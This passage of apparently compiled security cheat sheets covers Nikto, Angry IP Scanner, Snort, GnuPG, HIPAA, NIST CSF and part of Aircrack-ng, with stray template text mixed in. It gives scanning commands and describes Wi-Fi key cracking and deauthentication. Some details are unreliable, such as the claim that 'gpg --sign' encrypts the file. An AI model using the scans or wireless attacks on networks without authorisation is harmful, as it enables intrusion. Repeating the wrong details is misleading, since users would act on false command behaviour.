  • Vulnerability Assessment: Identify known vulnerabilities and misconfigurations on web servers.

  • Security Audits: Regularly scan servers for compliance and security posture.

  • Penetration Testing: Use as part of a broader toolkit to simulate attacks.

  • CI/CD Integration: Automate scans in development pipelines to catch issues early .


6. Best Practices

  • Update Regularly: Keep Nikto and its databases up-to-date for latest vulnerability checks.

  • Combine Tools: Use Nikto alongside other scanners (e.g., Nmap, Burp Suite) for comprehensive coverage.

  • Customize Scans: Tailor scans using tuning, plugins, and configuration to reduce noise and false positives.

  • Permission: Always have explicit authorization before scanning any system.

  • Schedule Scans: Run during off-peak hours to minimize impact on production systems.

  • Review Results: Manually verify findings to filter out false positives .


7. Security Considerations & Limitations

  • Not Stealthy: Nikto is easily detected by IDS/IPS and will appear in server logs.

  • False Positives: May report issues that are not exploitable; manual review is necessary.

  • Limited to Known Vulnerabilities: Does not detect zero-days or complex logic flaws.

  • Potential Impact: Scans can be resource-intensive; avoid on sensitive/production systems without planning .


8. Troubleshooting & Community Resources

Common Issues

  • Perl Errors: Ensure Perl is installed and up-to-date.

  • Network Issues: Check connectivity and firewall settings.

  • False Positives: Cross-reference with other tools and manual inspection.

  • Update Failures: Run as administrator/root if permissions are an issue.

Resources

  • Official Nikto GitHub

  • Nikto Documentation

  • Security Forums (Reddit, Stack Exchange)

  • OWASP Nikto Page

  • YouTube Tutorials


9. Real-World Examples

  • Enterprise: Regularly scheduled scans as part of vulnerability management.

  • Education: Used in cybersecurity courses for hands-on web security training.

  • Open Source Projects: Pre-release scans to ensure web app security .


10. Quick Reference: Example Commands

# Basic scan
perl nikto.pl -h http://example.com

# Scan with custom port and output to HTML
perl nikto.pl -h example.com -p 8080 -o scan.html -Format html

# Use SSL and specific tuning options
perl nikto.pl -h example.com -ssl -Tuning 123

# Use a proxy
perl nikto.pl -h example.com -useproxy

# List available plugins
perl nikto.pl -list-plugins

# Update Nikto
perl nikto.pl -update

11. Summary Table

Task
Command Example

Basic Scan

perl nikto.pl -h example.com

Scan HTTPS

perl nikto.pl -h example.com -ssl

Specify Port

perl nikto.pl -h example.com -p 8443

Output to File (HTML)

perl nikto.pl -h example.com -o out.html -Format html

Use Proxy

perl nikto.pl -h example.com -useproxy

Update Nikto

perl nikto.pl -update

List Plugins

perl nikto.pl -list-plugins

Custom User-Agent

perl nikto.pl -h example.com -useragent "TestAgent"

Tuning (e.g., XSS, Info)

perl nikto.pl -h example.com -Tuning 34


12. Further Reading & Learning

  • Official Documentation & Tutorials: Always refer to the official documentation for the latest features and usage.

  • Community Forums: Engage with the community for troubleshooting and advanced use cases.

  • Security Blogs & YouTube: Find step-by-step guides and real-world demonstrations.


By following this guide and cheat sheet, you can effectively install, configure, and use Nikto for web server vulnerability scanning, while understanding its strengths, limitations, and best practices for secure and responsible use .

Angry IP Scanner

Angry IP Scanner: Comprehensive Guide & Cheat Sheet

Angry IP Scanner is a fast, open-source, cross-platform network scanner popular among IT professionals, network administrators, and security enthusiasts. This guide provides a detailed overview, installation instructions, feature breakdown, usage tips, and a handy cheat sheet for quick reference.


1. Background & Overview

Angry IP Scanner is designed to scan IP addresses and ports, helping users discover devices and services on a network. Its key strengths are speed, simplicity, and extensibility through plugins. It is available for Windows, macOS, and Linux, and does not require installation on most platforms, making it highly portable .


2. Installation & Setup

General Installation Steps

  • Download: Visit the official Angry IP Scanner website and download the appropriate version for your operating system.

  • No Installation Required: On most platforms, Angry IP Scanner is a standalone executable (portable). Simply extract and run.

  • Java Requirement: Angry IP Scanner requires Java Runtime Environment (JRE). Ensure Java is installed on your system.

Platform-Specific Notes

  • Windows: Download the .exe file. Double-click to run. For advanced use, add the executable to your PATH for command-line access.

  • macOS: Download the .dmg or .jar file. For .dmg, drag to Applications. For .jar, run with java -jar.

  • Linux: Download the .deb, .rpm, or .jar file. Install using your package manager or run the .jar directly.

Tip: Always use the latest version for new features and security patches .


3. User Interface & Configuration

Main UI Elements

  • IP Range Fields: Enter the starting and ending IP addresses for your scan.

  • Ports Field: Specify which ports to scan (e.g., 80, 443, 1-1024).

  • Start/Stop Buttons: Begin or halt a scan.

  • Results Table: Displays discovered hosts, open ports, hostnames, MAC addresses, and more.

  • Menu Bar: Access preferences, plugins, export options, and help.

Configuration Settings

  • Preferences: Set default IP ranges, ports, thread count, and appearance (dark/light mode).

  • Data Fetchers: Choose which information to collect (e.g., hostname, MAC address, NetBIOS info).

  • Plugins: Manage and install plugins to extend functionality .


4. Basic Scanning Options

  • IP Range: Scan a single IP, a range (e.g., 192.168.1.1-254), or a list from a file.

  • Port Range: Scan specific ports (e.g., 22, 80, 443) or a range (e.g., 1-1024).

  • Ping Method: Choose between ICMP, TCP, or UDP ping to detect live hosts.

  • Threads: Adjust the number of concurrent threads for faster scanning (default: 100).


5. Advanced Features

  • Multithreaded Scanning: Scans multiple IPs/ports in parallel for speed .

  • Custom Data Fetchers: Add or remove columns to collect specific data.

  • Plugin Support: Extend with community or custom plugins.

  • Command-Line Interface (CLI): Automate scans and integrate with scripts .

  • Export Results: Save results as CSV, TXT, XML, or IP-Port list for further analysis .


6. Command-Line Usage

Angry IP Scanner can be run from the command line for automation:

ipscan [options]

Common Options:

  • -r <range>: Specify IP range (e.g., -r 192.168.1.1-254)

  • -p <ports>: Specify ports (e.g., -p 80,443,8080)

  • -o <file>: Output results to a file (CSV, TXT, XML)

  • -t <threads>: Set number of threads

  • -f <fetchers>: Specify data fetchers (e.g., hostname, mac)

Example:

ipscan -r 192.168.1.1-254 -p 22,80,443 -o results.csv -t 200

This scans the specified IP range for ports 22, 80, and 443, using 200 threads, and saves results to results.csv .


7. Exporting & Reporting

  • Export Formats: CSV, TXT, XML, IP-Port list.

  • Customizable Fields: Choose which columns to include in exports.

  • Integration: Exported data can be imported into spreadsheets, SIEMs, or other network management tools .


8. Performance Optimization

  • Increase Threads: Raise thread count for faster scans, but beware of network/device limits.

  • Limit Scan Range: Scan only necessary IPs/ports to reduce load.

  • Optimize Fetchers: Disable unnecessary data fetchers to speed up scans.

  • Batch Scanning: Use CLI for scheduled or automated scans .


9. Security Considerations

  • Use Responsibly: Scanning can trigger security alerts or violate policies. Always have authorization.

  • Avoid Overloading Networks: High thread counts can cause network congestion or device instability.

  • Data Privacy: Be cautious with exported data; it may contain sensitive network information.

  • Update Regularly: Keep Angry IP Scanner and Java updated to mitigate vulnerabilities .


10. Common Use Cases

  • Network Inventory: Discover all devices on a subnet.

  • Security Audits: Identify unauthorized or rogue devices.

  • Port Auditing: Check for open or vulnerable ports on network devices.

  • Troubleshooting: Diagnose connectivity issues by verifying device presence .


11. Troubleshooting & Best Practices

  • If No Results: Check firewall settings, network connectivity, and Java installation.

  • Slow Scans: Increase thread count or reduce scan range.

  • Permission Issues: Run as administrator/root if needed for certain ping methods.

  • Community Support: Use forums and community guides for help and plugin recommendations .

  • Regular Updates: Always use the latest version for bug fixes and new features.


12. Cheat Sheet

Task
GUI Steps / CLI Command Example

Scan local subnet

Enter 192.168.1.1-254 in IP range, click Start

Scan specific ports

Enter ports (e.g., 22,80,443) in Ports field

Export results

File > Export > Choose format (CSV, TXT, XML)

Increase scan speed

Edit > Preferences > Performance > Increase thread count

Command-line scan

ipscan -r 10.0.0.1-10.0.0.254 -p 80,443 -o scan.csv

Add data fetcher

Tools > Fetchers > Add/Remove columns

Use plugin

Tools > Plugins > Manage

Troubleshoot connectivity

Check firewall, run as admin/root, verify Java installation


13. Additional Resources

  • Official Documentation & Downloads

  • Community Forums & Plugins

  • GitHub Repository


14. Summary

Angry IP Scanner is a powerful, flexible, and user-friendly tool for network discovery and security auditing. Its cross-platform nature, plugin support, and automation capabilities make it suitable for a wide range of network management tasks. By following best practices and leveraging its advanced features, users can efficiently manage and secure their networks .


Use Angry IP Scanner responsibly and always ensure you have permission to scan the networks you target.

Snort

Comprehensive Guide and Cheat Sheet for Snort

Snort is a powerful, open-source network intrusion detection and prevention system (NIDS/NIPS) widely used in cybersecurity. This guide provides a thorough overview, practical cheat sheet, and best practices for deploying, configuring, and troubleshooting Snort.


1. Fundamental Concepts and Features

What is Snort?

  • Snort is an open-source NIDS/NIPS that performs real-time traffic analysis and packet logging on IP networks.

  • It detects a wide range of attacks and probes, including buffer overflows, port scans, CGI attacks, SMB probes, and OS fingerprinting attempts .

Key Features:

  • Packet Sniffing: Captures and analyzes network packets in real-time.

  • Logging: Stores packets for later analysis.

  • Intrusion Detection: Uses a rule-based language to detect anomalies and threats.

  • Preprocessor Plugins: Normalize and preprocess data before analysis.

  • Detection Engine: Applies rules to network traffic to identify suspicious activity .

Architecture Overview:

  • Packet Decoder: Decodes packet headers for analysis.

  • Preprocessors: Modify/normalize packet data.

  • Detection Engine: Analyzes packets using rules.

  • Logging/Alerting System: Logs events and generates alerts.

  • Output Modules: Integrate with other systems/formats .


2. Installation and Setup

System Requirements

  • Ensure your hardware meets the minimum requirements: sufficient RAM, disk space, and compatible CPU.

  • Check OS compatibility (Linux, Windows, macOS) .

Installation Steps

On Linux (Ubuntu Example)

sudo apt-get update
sudo apt-get install snort
  • During installation, you may be prompted to configure the network interface and HOME_NET variable.

On Windows

  • Download the Snort installer from the official website.

  • Run the installer and follow the prompts.

  • Configure environment variables and update the snort.conf file as needed .

General Setup Process

  1. Prepare the system (patches, disk space, drivers).

  2. Install Snort and dependencies.

  3. Configure network interfaces for monitoring.

  4. Update and configure rule sets.

  5. Test the installation with sample traffic .


3. Configuration Options

Configuration Files

  • Snort 3: Uses Lua-based configuration (snort.lua, snort_defaults.lua).

  • Snort 2: Uses snort.conf (can be converted to Lua with snort2lua tool) .

Key Configuration Elements

  • HOME_NET: Defines the protected network.

  • EXTERNAL_NET: Defines untrusted networks.

  • Rule Paths: Location of rule files.

  • Preprocessors: Enable/disable and configure as needed.

  • Output Plugins: Specify alert/log output formats .

Command-Line Configuration

  • Use --lua flag for custom Lua configurations in Snort 3 .


4. Snort Rule Syntax and Writing Guidelines

Rule Structure

A Snort rule consists of a header and options:

action protocol src_ip src_port direction dst_ip dst_port (options)

Example Rule

alert tcp $EXTERNAL_NET 80 -> $HOME_NET any (msg:"Attack attempt!"; flow:to_client,established; file_data; content:"1337 hackz 1337",fast_pattern,nocase; service:http; sid:1;)
  • Action: alert, block, drop, etc.

  • Protocol: tcp, udp, icmp, etc.

  • Source/Destination: IPs and ports.

  • Direction: -> or <-

  • Options: msg, flow, content, service, sid, rev, etc.

Rule Writing Guidelines

  • Be precise to avoid false positives.

  • Regularly update and optimize rules.

  • Avoid overly broad or incorrect syntax.

  • Leverage community and expert-contributed rules .


5. Common Use Cases and Deployment Scenarios

Use Cases

  • Intrusion Detection/Prevention: Real-time threat detection and blocking.

  • Network Monitoring: Anomaly detection and traffic analysis.

  • Security Log Analysis: Forensics and incident response.

  • Endpoint Security Complement: Monitors traffic to/from endpoints .

Deployment Scenarios

  • Network Segmentation: Monitor traffic between network segments.

  • Cloud Environments: Secure cloud-based resources.

  • Remote Work: Monitor remote device traffic .


6. Best Practices

  • Regular Updates: Keep Snort and rule sets up to date.

  • Integration: Combine with firewalls, SIEMs, and other security tools.

  • Continuous Monitoring: Implement 24/7 monitoring and incident response plans.

  • User Education: Train users to recognize and report threats .


7. Troubleshooting, Known Issues, and Community Solutions

Troubleshooting Methodology

  • Identify the Problem: Check logs, error messages, and system status.

  • Establish Theory: Isolate probable causes (e.g., rule conflicts, performance bottlenecks).

  • Test and Implement Solutions: Adjust configurations, update rules, or patch software.

  • Verify and Document: Ensure the issue is resolved and document the solution for future reference .

Community Resources

  • Engage with forums, mailing lists, and documentation repositories (e.g., Cisco, Red Hat).

  • Review real-world case studies for practical insights and solutions .


8. Real-World Examples and Case Studies

  • Cloud IDS: Snort deployed in cloud environments for scalable threat detection.

  • DNS Intrusion Detection: Custom Snort integration for DNS traffic analysis.

  • Zero-Day Detection: SnortML framework for machine learning-based detection.

  • Personal Experience: Used as a packet sniffer, logger, and IDS/IPS in various environments .


9. Snort Cheat Sheet

Basic Commands

# Test configuration
snort -T -c /etc/snort/snort.conf

# Run Snort in IDS mode
snort -c /etc/snort/snort.conf -i eth0

# Run Snort in packet logger mode
snort -l /var/log/snort -c /etc/snort/snort.conf

# Specify a custom rule file
snort -c /etc/snort/myrules.rules

Rule Writing Quick Reference

# Basic Rule Structure
action protocol src_ip src_port direction dst_ip dst_port (options)

# Example: Alert on HTTP traffic containing "malware"
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Possible malware download"; content:"malware"; http_uri; sid:1000001; rev:1;)

# Common Options
msg:"Description";         # Message to display
sid:1000001;              # Unique rule ID
rev:1;                    # Revision number
content:"string";         # Match content
nocase;                   # Case-insensitive match
flow:to_server,established; # Flow direction and state
service:http;             # Application protocol

Log and Alert Output

  • Default log location: /var/log/snort/

  • Alert formats: fast, full, unified2, syslog, etc.


10. Additional Resources

  • Snort Official Documentation

  • Snort Community Rules

  • Cisco Talos Intelligence

  • Snort Mailing Lists and Forums


Summary

Snort is a versatile and robust tool for network intrusion detection and prevention. By understanding its architecture, mastering rule writing, following best practices, and leveraging community resources, you can deploy and maintain an effective Snort-based security solution for a wide range of environments—from traditional networks to cloud and remote work scenarios .


Use this guide and cheat sheet as a reference for installation, configuration, rule writing, troubleshooting, and best practices to maximize your use of Snort in cybersecurity operations.

GnuPG

Comprehensive Guide and Cheat Sheet for GnuPG

GNU Privacy Guard (GnuPG or GPG) is a powerful, open-source tool for secure communication and data storage. It implements the OpenPGP standard (RFC 4880, now RFC 9580) and is widely used for encrypting, decrypting, signing, and verifying data and communications. This guide provides a thorough overview, practical cheat sheet, and best practices for using GnuPG effectively.


1. Fundamentals and Architecture

  • What is GnuPG? GnuPG is a free software suite for encryption and signing of data and communications, compliant with the OpenPGP standard. It uses a hybrid encryption model: symmetric-key cryptography for speed and public-key cryptography for secure key exchange .

  • Core Components:

    • Key Management System: Generate, manage, and exchange public/private key pairs.

    • Encryption & Signing: Supports RSA, ElGamal, DSA, and AES algorithms.

    • Libgcrypt: Provides cryptographic functions, including elliptic-curve cryptography.

    • Frontends: Command-line tool with GUI frontends like Seahorse (GNOME) and KGPG (KDE).

    • Protocols: Supports OpenPGP, S/MIME, and SSH .


2. Installation and System Requirements

  • Supported OS: Windows, macOS, Linux, RISC OS, Android .

  • System Requirements:

    • Windows: Compatible with modern versions (e.g., Windows 10+), requires at least 1 GHz CPU, 1–2 GB RAM.

    • Linux/macOS: Check distribution compatibility and install via package manager (e.g., apt, yum, brew).

  • Installation Steps:

    1. Download from official GnuPG site.

    2. Install using the provided installer or package manager.

    3. Verify installation: gpg --version .

  • Configuration: GnuPG stores configuration and keyrings in ~/.gnupg by default .


3. Key Management

Key Generation

gpg --gen-key
  • Follow prompts for name, email, key type, size, and expiration .

Listing Keys

gpg --list-keys           # List public keys
gpg --list-secret-keys    # List private keys

Exporting Keys

gpg --export -a "User Name" > publickey.asc
gpg --export-secret-keys -a "User Name" > privatekey.asc
  • -a outputs in ASCII-armored format .

Importing Keys

gpg --import publickey.asc

Key Revocation

  • Generate a revocation certificate (do this when you create your key!):

gpg --output revoke.asc --gen-revoke your@email.com
  • Import the revocation certificate if needed:

gpg --import revoke.asc

Key Signing and Trust

  • Sign someone’s public key to certify it:

gpg --sign-key email@example.com
  • Set trust level:

gpg --edit-key email@example.com
# Then use the 'trust' command in the interactive prompt

4. Encryption, Decryption, Signing, and Verification

Encrypting Files

gpg --encrypt --recipient recipient@email.com file.txt
  • Output: file.txt.gpg (encrypted file) .

Decrypting Files

gpg --decrypt file.txt.gpg
  • Outputs decrypted content to stdout or file .

Signing Files

gpg --sign file.txt
  • Creates file.txt.gpg (signed and encrypted).

  • To create a detached signature:

gpg --detach-sign file.txt

Verifying Signatures

gpg --verify file.txt.gpg
gpg --verify file.txt.sig file.txt

Encrypt and Sign in One Step

gpg --encrypt --sign --recipient recipient@email.com file.txt

5. Integration with Other Software

Email Clients

  • Thunderbird + Enigmail (or built-in OpenPGP support in recent Thunderbird versions).

  • Mailvelope for webmail.

  • Process:

    1. Generate/import keys in GnuPG.

    2. Configure email client to use GnuPG.

    3. Share public key with contacts.

    4. Encrypt/sign emails as needed .

Git

  • Sign commits:

git config --global user.signingkey <key-id>
git commit -S -m "Your commit message"
  • Verify signed commits: Platforms like GitHub and GitLab display commit verification status .

Other Integrations

  • Python: Use python-gnupg for programmatic access.

  • S/MIME and SSH: GnuPG can manage S/MIME certificates and SSH keys .


6. Best Practices and Security Considerations

  • Key Management:

    • Use strong passphrases for private keys.

    • Regularly rotate keys and subkeys.

    • Backup keys and revocation certificates securely.

    • Revoke and replace compromised keys immediately .

  • Algorithm Selection:

    • Use strong, modern algorithms (e.g., RSA 4096-bit, ECC).

    • Avoid deprecated algorithms.

  • Verification:

    • Always verify signatures on received files and messages.

    • Check key fingerprints before trusting/importing keys .

  • Updates:

    • Keep GnuPG and related software up to date to patch vulnerabilities .

  • User Education:

    • Train users on secure key handling and the importance of encryption .


7. Troubleshooting

  • Cannot Decrypt:

    • Ensure the correct private key is in your keyring.

    • Check file permissions on ~/.gnupg.

  • Signature Verification Fails:

    • Import the sender’s public key.

    • Check for key expiration or revocation.

  • Key Not Trusted:

    • Set trust level using gpg --edit-key and the trust command.

  • General Help:

    • gpg --help for command options.

    • Consult official documentation and community forums for support .


8. Cheat Sheet: Common GnuPG Commands

Task
Command Example

Generate keypair

gpg --gen-key

List public keys

gpg --list-keys

List private keys

gpg --list-secret-keys

Export public key

gpg --export -a "User Name" > publickey.asc

Export private key

gpg --export-secret-keys -a "User Name" > privatekey.asc

Import key

gpg --import publickey.asc

Encrypt file

gpg --encrypt --recipient user@email.com file.txt

Decrypt file

gpg --decrypt file.txt.gpg

Sign file

gpg --sign file.txt

Detached signature

gpg --detach-sign file.txt

Verify signature

gpg --verify file.txt.sig file.txt

Generate revocation cert

gpg --output revoke.asc --gen-revoke your@email.com

Sign another’s key

gpg --sign-key email@example.com

Edit key (set trust, etc.)

gpg --edit-key email@example.com

List fingerprints

gpg --fingerprint


9. Resources

  • Official Documentation: https://gnupg.org/documentation/

  • Community Forums & Mailing Lists: https://gnupg.org/community/

  • Tutorials: YouTube, technical blogs, and course platforms.

  • Integration Guides: Search for specific guides for your email client, Git, or other software .


10. Summary Table: Common Use Cases

Use Case
Description

Email Encryption

Securely send/receive emails; verify sender identity

File Encryption

Protect sensitive files at rest or in transit

Software Signing

Sign software releases to ensure authenticity

Secure Messaging

Encrypt messages in chat or collaboration tools

Git Commit Signing

Verify code authorship and integrity in version control


By following this guide and cheat sheet, you can confidently use GnuPG for a wide range of security and privacy tasks, from personal email encryption to professional software signing and secure development workflows .

HIPPA

HIPAA Comprehensive Summary Guide & Cheat Sheet (2025)


What is HIPAA?

HIPAA stands for the Health Insurance Portability and Accountability Act of 1996. It is a federal law designed to protect sensitive patient health information from being disclosed without the patient's consent or knowledge.


Key HIPAA Rules

1. Privacy Rule

  • Purpose: Protects the privacy of individually identifiable health information (PHI).

  • Who Must Comply: Health care providers, health plans, and health care clearinghouses (collectively called "covered entities"), and their business associates.

  • What’s Protected: All forms of PHI—oral, paper, and electronic.

  • Permitted Uses/Disclosures: For treatment, payment, health care operations, and certain public interest activities (e.g., law enforcement, public health) .

  • Patient Rights: Right to access, amend, and receive an accounting of disclosures of their PHI.

2. Security Rule

  • Purpose: Sets standards for safeguarding electronic PHI (ePHI).

  • Safeguards Required:

    • Administrative: Policies, workforce training, risk analysis.

    • Physical: Facility access controls, workstation security.

    • Technical: Access controls, audit controls, encryption.

3. Breach Notification Rule

  • Purpose: Requires covered entities to notify affected individuals, HHS, and sometimes the media of a breach of unsecured PHI.

  • Timeline: Notification must be made without unreasonable delay and no later than 60 days after discovery.

4. Enforcement Rule

  • Purpose: Establishes procedures for investigations, penalties, and hearings for HIPAA violations.


What is PHI?

Protected Health Information (PHI) includes any information that can identify an individual and relates to their health status, provision of health care, or payment for health care. Examples: names, addresses, birth dates, Social Security numbers, medical records, lab results, insurance information.


Who Must Comply?

  • Covered Entities: Health care providers, health plans, health care clearinghouses.

  • Business Associates: Vendors and subcontractors who handle PHI on behalf of covered entities.


HIPAA Compliance Checklist (Quick Reference)

  • Appoint a HIPAA Privacy & Security Officer

  • Conduct regular risk assessments

  • Implement written policies and procedures

  • Train all workforce members on HIPAA

  • Secure all forms of PHI (paper, oral, electronic)

  • Limit PHI access to only those who need it

  • Use secure methods for transmitting PHI (encryption, secure email)

  • Have a breach notification process in place

  • Maintain documentation of compliance efforts

  • Review and update policies regularly.


Common HIPAA Violations

  • Unauthorized access to PHI

  • Failure to perform risk assessments

  • Lack of employee training

  • Improper disposal of PHI

  • Lost or stolen devices containing ePHI

  • Failure to notify affected parties after a breach


Patient Rights Under HIPAA

  • Access: Patients can request and obtain copies of their health records.

  • Amendment: Patients can request corrections to their records.

  • Restrictions: Patients can request restrictions on certain uses/disclosures.

  • Confidential Communications: Patients can request communications by alternative means or locations.

  • Accounting: Patients can request a record of certain disclosures.


HIPAA in Practice: Quick Tips

  • Always verify identity before sharing PHI

  • Never discuss PHI in public areas

  • Lock computers and files when not in use

  • Report suspected breaches immediately

  • Use strong passwords and change them regularly

  • Shred documents containing PHI before disposal.


Recent Updates (2025)

  • Proposed changes to the Security Rule: New mandates may be coming, including enhanced requirements for risk analysis, incident response, and encryption standards.

  • Stay updated: Regularly check for new guidance from HHS and OCR.


HIPAA Cheat Sheet Table

Rule

What It Covers

Key Actions

Privacy Rule

PHI in all forms

Limit use/disclosure, patient rights

Security Rule

ePHI

Safeguards: admin, physical, technical

Breach Rule

Breaches of PHI

Notify affected parties, HHS

Enforcement Rule

Compliance & penalties

Investigations, fines, corrective action


Bookmark this guide for quick reference and always follow your organization’s HIPAA policies!

Free Email Security

Free Backup and Recovery

Free Offensive Security

Free SOAR

Cybersecurity Newsletters

InfoSec Podcasts

InfoSec Slack Channels

Cybersecurity Conferences

InfoSec Discord Servers

Welcome

Welcome to the GitBook Starter Template! Here you'll get an overview of all the amazing features GitBook offers to help you build beautiful, interactive documentation.

You'll see some of the best parts of GitBook in action — and find help on how you can turn this template into your own.

Jump right in

NIST CSF

by Alex Joseph

NIST Cybersecurity Framework (CSF) 2.0: Comprehensive Summary & Cheat Sheet


What is the NIST CSF?

The NIST Cybersecurity Framework (CSF) is a set of voluntary guidelines, standards, and best practices developed by the U.S. National Institute of Standards and Technology (NIST) to help organizations manage and reduce cybersecurity risks. Originally designed for critical infrastructure, it is now widely adopted across all sectors and organization sizes, both in the U.S. and globally .


History & Evolution

  • 2013: Executive Order 13636 calls for improved cybersecurity for critical infrastructure.

  • 2014: NIST CSF Version 1.0 released.

  • 2018: Version 1.1 released, adding supply chain risk management and self-assessment enhancements.

  • 2024: Version 2.0 released, introducing the "Govern" function and expanding global applicability .


Purpose

  • Risk Management: Provides a flexible, scalable approach to managing cybersecurity risk.

  • Integration: Aligns with existing standards and best practices.

  • Communication: Offers a common language for internal and external cybersecurity discussions.

  • Continuous Improvement: Encourages regular assessment and enhancement of cybersecurity practices .


Core Components

1. Framework Core

The Core is organized into six key functions (as of v2.0):

Function
Purpose

Govern

Establish and monitor the organization's cybersecurity risk management strategy, policies, and roles. (New in v2.0)

Identify

Understand the business context, resources, and risks to manage cybersecurity efforts.

Protect

Implement safeguards to ensure delivery of critical services.

Detect

Identify the occurrence of cybersecurity events.

Respond

Take action regarding detected cybersecurity incidents.

Recover

Restore capabilities or services impaired by cybersecurity incidents.

Each function is divided into categories and subcategories detailing specific activities and outcomes .

NIST CSF Functions Diagram

2. Implementation Tiers

Tiers describe the degree to which an organization’s cybersecurity risk management practices exhibit the characteristics defined in the framework:

Tier
Description

1

Partial: Ad hoc, reactive, limited awareness of risks.

2

Risk-Informed: Some risk management, but not standardized across the organization.

3

Repeatable: Formalized, standardized, and regularly updated practices.

4

Adaptive: Continuous improvement, proactive, integrated into organizational culture.

Tiers are not maturity levels but benchmarks for improvement .


3. Framework Profiles

  • Current Profile: Describes the organization’s current cybersecurity posture.

  • Target Profile: Describes the desired state of cybersecurity.

  • Gap Analysis: Comparing profiles helps identify and prioritize improvement actions .


Deep Dive: The Six Core Functions (v2.0)

1. Govern (GV) (New in v2.0)

  • Establishes and monitors cybersecurity risk management strategy, policies, and roles.

  • Ensures alignment with organizational objectives and regulatory requirements .

2. Identify (ID)

  • Asset Management: Inventory of data, personnel, devices, systems, and facilities.

  • Business Environment: Understanding mission, objectives, and critical functions.

  • Governance: Policies, procedures, and processes for cybersecurity.

  • Risk Assessment: Identifying and evaluating risks.

  • Risk Management Strategy: Defining risk tolerance and priorities.

  • Supply Chain Risk Management: Managing third-party and supply chain risks .

3. Protect (PR)

  • Identity Management & Access Control: Managing access to assets.

  • Awareness & Training: Ensuring personnel are trained.

  • Data Security: Protecting data confidentiality, integrity, and availability.

  • Information Protection Processes: Policies and procedures for protection.

  • Maintenance: Regular maintenance of systems.

  • Protective Technology: Implementing technical security solutions .

4. Detect (DE)

  • Anomalies & Events: Detecting unusual activity.

  • Continuous Monitoring: Ongoing monitoring of systems.

  • Detection Processes: Testing and maintaining detection capabilities .

5. Respond (RS)

  • Response Planning: Executing response plans.

  • Communications: Coordinating internal and external communications.

  • Analysis: Analyzing incidents and response effectiveness.

  • Mitigation: Containing and mitigating incidents.

  • Improvements: Incorporating lessons learned .

6. Recover (RC)

  • Recovery Planning: Restoring services and capabilities.

  • Improvements: Updating recovery strategies.

  • Communications: Coordinating recovery communications .


Implementation Guidelines

  • Flexible & Scalable: Adaptable to any organization, regardless of size or sector.

  • Not Prescriptive: Complements, not replaces, existing cybersecurity programs.

  • Risk-Based: Focuses on managing cybersecurity as an ongoing risk management process .


Real-World Examples

  • Healthcare: Enhanced cybersecurity posture through CSF adoption.

  • Financial Services: Standardized security across subsidiaries.

  • Utilities: Improved incident response and resilience.

  • Local Government: Assessed and improved cybersecurity using CSF.

  • Cloud Providers: Achieved regulatory compliance and structured controls.

  • Small Businesses: Protected data and improved security with CSF .


Quick Reference Table: NIST CSF Functions & Categories

Function
Example Categories (not exhaustive)

Govern

Risk Management Strategy, Policy Development, Roles & Responsibilities

Identify

Asset Management, Business Environment, Governance, Risk Assessment, Supply Chain Risk Management

Protect

Access Control, Awareness & Training, Data Security, Maintenance, Protective Technology

Detect

Anomalies & Events, Continuous Monitoring, Detection Processes

Respond

Response Planning, Communications, Analysis, Mitigation, Improvements

Recover

Recovery Planning, Improvements, Communications


Resources & Tools

  • NIST Quick Start Guides: Step-by-step implementation instructions.

  • Resource Repository: Case studies, mappings, educational materials.

  • Implementation Examples: Available for various sectors and organization sizes .


Key Takeaways

  • The NIST CSF is a globally recognized, flexible framework for managing cybersecurity risk.

  • Version 2.0 introduces the "Govern" function and aligns more closely with privacy and risk management.

  • The framework is structured around six core functions, implementation tiers, and profiles for continuous improvement.

  • Widely applicable, with real-world success stories across industries.


Use this cheat sheet as a high-level guide to understanding, communicating, and implementing the NIST Cybersecurity Framework in your organization.

Aircrack-ng

Aircrack-ng Comprehensive Guide & Cheat Sheet

Aircrack-ng is a powerful suite of tools for auditing and securing Wi-Fi networks. This guide covers its fundamentals, installation, core tools, common attack/defense techniques, troubleshooting, legal/ethical considerations, and a command reference cheat sheet.


1. Fundamentals, Components, and Architecture

Aircrack-ng is a suite for wireless network auditing, penetration testing, and security research. It is widely used for:

  • Cracking WEP and WPA/WPA2-PSK keys

  • Capturing and analyzing Wi-Fi traffic

  • Performing packet injection and deauthentication attacks

  • Creating fake access points for testing

Architecture:

  • Written in C, cross-platform (Linux, Windows)

  • Works with wireless cards supporting monitor mode and raw packet injection

  • Includes tools for monitoring, attacking, testing, and cracking wireless networks .

Main Components:

  • Airmon-ng: Enables/disables monitor mode on wireless interfaces

  • Airodump-ng: Captures packets and displays network/client info

  • Aireplay-ng: Injects/replays packets, performs attacks (e.g., deauth)

  • Aircrack-ng: Cracks WEP/WPA/WPA2-PSK keys

  • Airbase-ng: Creates fake access points

  • Airgraph-ng: Visualizes network traffic

  • Others: Tools for decryption, packet forging, database management, etc.

Enabling monitor mode with airmon-ng


2. Installation & System Requirements

Supported Platforms

  • Linux (preferred, e.g., Kali Linux, Parrot OS)

  • Windows (limited support)

  • macOS (with some limitations)

Requirements

  • Wireless card supporting monitor mode and packet injection

  • Sufficient system resources (RAM, CPU)

  • Administrative/root privileges

Installation Steps (Linux Example)

  1. Update system: sudo apt update && sudo apt upgrade

  2. Install dependencies: sudo apt install build-essential libssl-dev libnl-3-dev libnl-genl-3-dev ethtool pkg-config

  3. Install Aircrack-ng:

    • From repo: sudo apt install aircrack-ng

    • From source:

      git clone https://github.com/aircrack-ng/aircrack-ng.git
      cd aircrack-ng
      autoreconf -i
      ./configure
      make
      sudo make install

Windows Installation

  • Download the latest Windows binaries from the official site.

  • Extract and run as administrator.

  • Note: Limited driver support for monitor mode and injection.


3. Aircrack-ng Suite: Tools Overview

Tool
Purpose

airmon-ng

Enable/disable monitor mode on wireless interfaces

airodump-ng

Capture packets, display APs/clients, save handshakes

aireplay-ng

Inject/replay packets, deauth, ARP replay, fragmentation, etc.

aircrack-ng

Crack WEP/WPA/WPA2-PSK keys using captured packets

airbase-ng

Create fake APs, perform MITM attacks

airdecap-ng

Decrypt WEP/WPA/WPA2 capture files

airgraph-ng

Visualize network traffic

airdrop-ng

Rule-based deauthentication

airolib-ng

Manage WPA/WPA2 passphrase databases

airserv-ng

Wireless card TCP/IP server

airtun-ng

Create virtual tunnel interfaces

packetforge-ng

Create custom encrypted packets

easside-ng

Communicate with WEP APs without key (experimental)

tkiptun-ng

WPA/TKIP attack (experimental)

wesside-ng

Automated WEP key recovery (experimental)

ivstools

Manage .ivs files (merge, convert)

makeivs-ng

Generate IVS dump files for testing

kstats

Analyze FMS algorithm votes for IVS dumps

